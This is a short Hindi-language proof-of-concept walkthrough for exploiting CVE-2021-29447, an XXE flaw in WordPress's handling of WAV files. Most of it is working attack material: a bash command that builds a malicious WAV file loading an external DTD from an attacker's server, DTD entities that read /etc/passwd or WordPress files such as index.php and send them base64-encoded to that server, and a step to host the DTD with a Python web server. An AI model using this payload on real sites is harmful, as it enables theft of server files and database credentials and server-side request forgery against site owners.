
CVE-2021-29447 के लिए प्रमाण-की-अवधारणा शोषण, एक WordPress XXE भेद्यता जो क्राफ्टेड WAV फ़ाइलों के माध्यम से मनमाना फ़ाइल प्रकटीकरण और SSRF सक्षम करती है।
मनमाना फ़ाइल प्रकटीकरण: होस्ट के फ़ाइल सिस्टम पर किसी भी फ़ाइल की सामग्री प्राप्त की जा सकती है, जैसे wp-config.php जिसमें डेटाबेस क्रेडेंशियल जैसी संवेदनशील जानकारी होती है। सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF): WordPress इंस्टॉलेशन की ओर से HTTP अनुरोध किए जा सकते हैं। वातावरण के आधार पर, इसके गंभीर परिणाम हो सकते हैं। कमजोरी का शोषण करना
इस कमजोरी से प्रभावित एक वर्डप्रेस साइट की पहचान wpscan टूल की सहायता से गणना प्रक्रिया में की गई है।

यह बहुत आसान है, अपने bash कंसोल में
nano poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
अपने हमलावर पीसी पर एक dtd बनाएं जिसमें कोड वेब सर्वर पर निष्पादित हो।
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
नोट: वर्डप्रेस फ़ाइलें पढ़ने के लिए सिंटैक्स "../WP-FILE.php" का उपयोग करें
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
फ़ाइलों की निर्देशिका के लिए एक python सर्वर होस्ट करें (python3 -m http.server 8081)